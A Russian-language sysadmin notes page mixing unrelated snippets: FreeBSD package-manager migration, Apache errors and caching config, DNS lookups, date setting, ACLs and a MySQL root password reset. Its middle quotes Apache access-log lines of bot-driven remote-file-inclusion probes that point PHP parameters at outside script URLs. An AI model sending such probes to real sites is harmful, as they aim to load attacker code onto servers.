1 Менеджер пакетов pkgng FreeBSD 8.4 (pkg_* -> pkg)
На старом сервере при установке пакета увидел сообщение -
pkg_install EOL is scheduled for 2014-09-01. Please consider migrating to pkgng
--> решил обновить пакетный менеджер.
[Wed Oct 05 13:14:26 2011] [error] (OS 10038)Сделана попытка выполнить операцию на объекте, не являющемся сокетом. : Child 8916: Encountered too many errors accepting client connections. Possible causes: dynamic address renewal, or incompatible VPN or firewall software. Try using the Win32DisableAcceptEx directive.
<IfModule mpm_winnt_module>
Win32DisableAcceptEx
</IfModule>
host -n -t mx skillz.ru [8.8.8.8]
# узнаем mx запись
# последним параметромможно указать через какой сервер имен производить запрос
# skillz.ru mail is handled by 0 skillz.ru.
dig @8.8.8.8 mx skillz.ru +short
# запрос mx записи в коротком формате через сервер 8.8.8.8
# 0 skillz.ru.
dig +nocmd skillz.ru mx +noall +answer
# узнаем mx запись
# skillz.ru. 14199 IN MX 0 skillz.ru.
dig skillz.ru mx +short
# 0 skillz.ru.
#год месяц день часы минуты секунды
date yymmddhhmmss
#установка времени без модификации даты часы:минуты
date hhmm
#пример
date 0501121627
date 1627
/usr/sbin/ntpdate -u ntp.psn.ru
var_dump(preg_match('~строка~Uu', 'test', $m));
>> Compilation failed: this version of PCRE is not compiled with PCRE_UTF8 support at offset 0
ifconfig_rl0="inet 10.99.0.99 netmask 255.255.0.0 polling mtu 8232"
...
69.73.189.182 - - [05/Oct/2008:03:31:29 +0400] "GET /page/5/errors.php?error=http://www.ezy-hosts.com//temp/errors??? HTTP/1.1" 200 626 "-" "libwww-perl/5.79"
72.249.95.130 - - [05/Oct/2008:03:32:15 +0400] "GET /galleria.html.php?mosConfig_absolute_path=http://ctg.su/files/bodo.txt??? HTTP/1.1" 200 630 "-" "libwww-perl/5.805"
62.44.82.234 - - [05/Oct/2008:03:26:25 +0400] "GET /errors.php?error=http://www.stichtingopvangratten.nl/cache/response.txt??? HTTP/1.1" 200 639 "-" "libwww-perl/5.803"
61.80.90.1 - - [05/Oct/2008:03:19:38 +0400] "GET /errors.php?error=http://oursoultvxq.com/bbs/data/vip/id2.txt??? HTTP/1.1" 200 620 "-" "libwww-perl/5.79"
61.80.90.1 - - [05/Oct/2008:03:19:38 +0400] "GET /bans/page/6/errors.php?error=http://oursoultvxq.com/bbs/data/vip/id2.txt??? HTTP/1.1" 200 632 "-" "libwww-perl/5.79"
...
ExpiresActive On
#day
ExpiresByType text/css "access plus 7 day"
ExpiresByType text/javascript "access plus 7 day"
#month
ExpiresByType image/gif A2592000
ExpiresByType image/jpg A2592000
ExpiresByType image/png A2592000
DeflateBufferSize 16384
DeflateCompressionLevel 5
AddOutputFilterByType DEFLATE text/html text/plain text/xml text/javascript text/css text/xml application/xhtml+xml
cd /www
find . -type f -exec setfacl -m g:seo_users:rw-,mask::rwx {} \;
find . -type d -exec setfacl -d -m u::rwx,g::rwx,o::---,mask::rw-,g:seo_users:rwx {} \;
find . -type d -exec setfacl -m g:seo_users:rw- {} \;
UPDATE mysql.user SET Password=PASSWORD('password') WHERE User='root';
GRANT ALL PRIVILEGES ON *.* TO root@localhost IDENTIFIED BY PASSWORD PASSWORD('password') WITH GRANT OPTION;
FLUSH PRIVILEGES;
#порезать
split -b 128m <filename>
#склеить куски
cat xa* > <filename>
PID USERNAME PRI NICE SIZE RES STATE C TIME WCPU CPU COMMAND
56099 mysql 20 0 345M 45492K kserel 1 986:41 112.55% 112.55% mysqld
# cd /usr/ports/net/cvsup-without-gui
# make install clean